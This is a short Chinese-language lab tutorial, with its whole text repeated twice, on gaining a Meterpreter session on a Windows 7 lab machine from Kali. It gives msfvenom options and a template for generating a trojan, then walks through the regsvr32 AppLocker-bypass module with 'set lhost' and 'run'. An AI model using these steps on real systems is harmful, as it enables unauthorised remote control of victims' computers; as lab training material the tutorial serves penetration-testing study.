攻击机：kaili

ip：192.168.80.157

目标机：win7

IP：192.168.80.158

这里用两种方法去创建meterpreter会话：

1）利用kali中的msfvenom生成木马，在目标机上运行，具体步骤如下：

常用参数：

-p 选择攻击的payload
-l 载荷列表
-f 生成的文件格式
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
一般格式：

msfvenom -p 指定攻击的payload LHOST=监听IP LPORT=监听端口 -f 输出的文件格式 -o 生成木马的文件名

生成木马

设置监听

待目标机运行刚刚生成的木马时，就会产生一个meterpreter会话

2）使用web_delivery模块（你也可以选择其他模块，过程都是相似的）

查看该模块可以使用的payload

这里我们使用exploit/windows/misc/regsvr32_applocker_bypass_server

然后设置IP：set lhost 192.168.80.157

最后运行：run，我们可以看到最下面出现一行命令，根据提示，复制这条命令到目标机上运行即可：

在win7中运行该命令

然后在kali中我们就可以看到已经成功监听，并且返回一个session：

输入命令：sessions 1 既可以创建meterpreter会话，控制目标机

攻击机：kaili

ip：192.168.80.157

目标机：win7

IP：192.168.80.158

这里用两种方法去创建meterpreter会话：

1）利用kali中的msfvenom生成木马，在目标机上运行，具体步骤如下：

常用参数：

-p 选择攻击的payload
-l 载荷列表
-f 生成的文件格式
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
一般格式：

msfvenom -p 指定攻击的payload LHOST=监听IP LPORT=监听端口 -f 输出的文件格式 -o 生成木马的文件名

生成木马

设置监听

待目标机运行刚刚生成的木马时，就会产生一个meterpreter会话

2）使用web_delivery模块（你也可以选择其他模块，过程都是相似的）

查看该模块可以使用的payload

这里我们使用exploit/windows/misc/regsvr32_applocker_bypass_server

然后设置IP：set lhost 192.168.80.157

最后运行：run，我们可以看到最下面出现一行命令，根据提示，复制这条命令到目标机上运行即可：

在win7中运行该命令

然后在kali中我们就可以看到已经成功监听，并且返回一个session：

输入命令：sessions 1 既可以创建meterpreter会话，控制目标机